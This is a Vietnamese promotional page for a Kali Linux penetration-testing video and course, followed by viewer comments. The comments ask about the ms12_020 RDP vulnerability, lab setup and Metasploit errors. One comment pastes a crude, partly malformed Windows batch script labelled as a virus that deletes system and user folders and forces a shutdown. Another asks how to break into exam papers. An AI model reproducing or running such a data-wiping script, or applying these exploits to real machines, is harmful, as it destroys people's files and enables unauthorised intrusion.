[Bài dự thi] Thử nghiệm xâm nhập và tấn công bằng Kali Linux
—-Link khóa học về Hacker—
—————————————————————————————————-
Để học toàn bộ khóa học này và nhận ƯU ĐÃI về giá, các bạn có thể liên hệ trực tiếp với mình (anh Tùng) theo email: khanhtung@gmail.com, di động: 0919892981. Cám ơn các bạn.
Nguồn:https://ftlinuxcourse.com/
Xem Thêm Bài Viết Khác:https://ftlinuxcourse.com/khoa-hoc
Comments
Cái này như kiểu lệnh shutdow trong cmd phải k nhỉ :))
Trò trẻ con :))))
làm sao biết có những lỗ hổng nào vậy anh.ví dụ của anh là ms12_020
Sao tui linux ubuntu ko có 600 công cụ z…. và gõ lệnh đéo có # mà là ~$ KO AK
Tui ubuntu sao ko thấy 600 công cụ z tr
làm s để 2 máy ảo kết nối cùng mạng lan ạ
vs win7 hay win 10 chắc bị fix hết rồi :))))
Khó vậy ad làm sao dễ hiểu cái
máy em cài bị khác địa chỉ ip , nên ad chỉ cách cấu hình với ?
Ngoài ms12_020 thì còn lỗ hổng nào khác không ad, hay windows 8 và xp có lỗ hổng khác nhau chứ ạ @cách dùng máy tính
ms12_020 là một lỗ hổng cố định ở windows hả anh, hay làm cách nào để tìm ra lỗ hổng trên máy trc khi khai thác nó ạ
Bắt buộc là mạng lan hả ad hay là dùng wifi đc ko
[-] 172.16.244.129 – 172.16.244.129 – RDP Service Unreachable
Em bị lỗi này thì phải làm thế nào ạ?
Cám ơn thầy đã share video
anh oi tai sao no hien loi la Traceback (most recent call last):
13: from /usr/bin/msfconsole:48:in `<main>'
12: from /usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
11: from /usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
10: from /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:191:in `run'
9: from /usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:375:in `get_input_line'
8: from /usr/share/metasploit-framework/lib/rex/ui/text/input/readline.rb:100:in `pgets'
7: from /usr/share/metasploit-framework/lib/rex/ui/text/input/readline.rb:162:in `readline_with_output'
6: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rb-readline-0.5.5/lib/rbreadline.rb:4871:in `readline'
5: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rb-readline-0.5.5/lib/rbreadline.rb:7072:in `rl_prep_terminal'
4: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rb-readline-0.5.5/lib/rbreadline.rb:6967:in `save_tty_chars'
3: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rb-readline-0.5.5/lib/rbreadline.rb:6957:in `retry_if_interrupted'
2: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/rb-readline-0.5.5/lib/rbreadline.rb:6968:in `block in save_tty_chars'
1: from /usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/core_ext/kernel/agnostics.rb:7:in “'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.5.0/gems/activesupport-4.2.10/lib/active_support/core_ext/kernel/agnostics.rb:7:in “': Cannot allocate memory – stty (Errno::ENOMEM)
a nhận e làm đệ tử đi a
Tạo hđh này có cần mạng k ad
cai tren may that lun duoc k a
Chỉ cách xâm nhập đề thi đi anh ơi
Sao của em đều chạy dc mà ko màn hình xanh dc ạ. [-] 192.168.149.128:3389 – 192.168.149.128:3389 – RDP Service Unreachable nghĩa là sao ạ
cai nay that ra sai tren ubuntu van duoc,tuy nhien la minh phai cai tools cua kali hoi mat thoi gian 1 chut thoi.
thì ra bữa h mình bị hack :0
@echo off
disable mouse
disable keyboard
disable system32
del C:
del C:Windows
del C:Windowssystem32
del C:system32logonu1.exe
del C:windowssystem32restore
del C:windowssystem32winlogin.exe
del C:windows
del C:NVIDIA
del C:windows
del C:Documents And Settings
del D:RECOVERY
del C:SwSetup
del C:Temp
del C:Program Files
del C:PerfLogs
del C:.rnd
del C:Brukere
del C:Users
del C:MCPP
del C:CMD
del C:
disable windows
dir /s
echo I am your virus. I deleted your files
echo because you tried to delete me.
echo By the way, I am –>_<–."
pause
shutdown -s -t 10 -c "Say goodbye to you computer!"
Vô coi ip thì nói gì nữa . Ko lẽ muốn xâm nhập máy ai phải lại xin ip ta sao
Nếu là Win10 thì sao?
ad ơi cho e hỏi. làm sao để mở cổng 3389
ad oi em muon hoc lam hacker thi phải bắt dầu từ bước nào
vay con loi nao ngoai ms12_020 vay ad?
S biết đựoc lỗ hỏng tên là ms12_020 v ad
Tại sao lại là port 3389 và ms12_020 v nhỉ?? 2 cái đó có nghĩa là gì v ad?
Cái này chạy giả lập trên win hay …
<3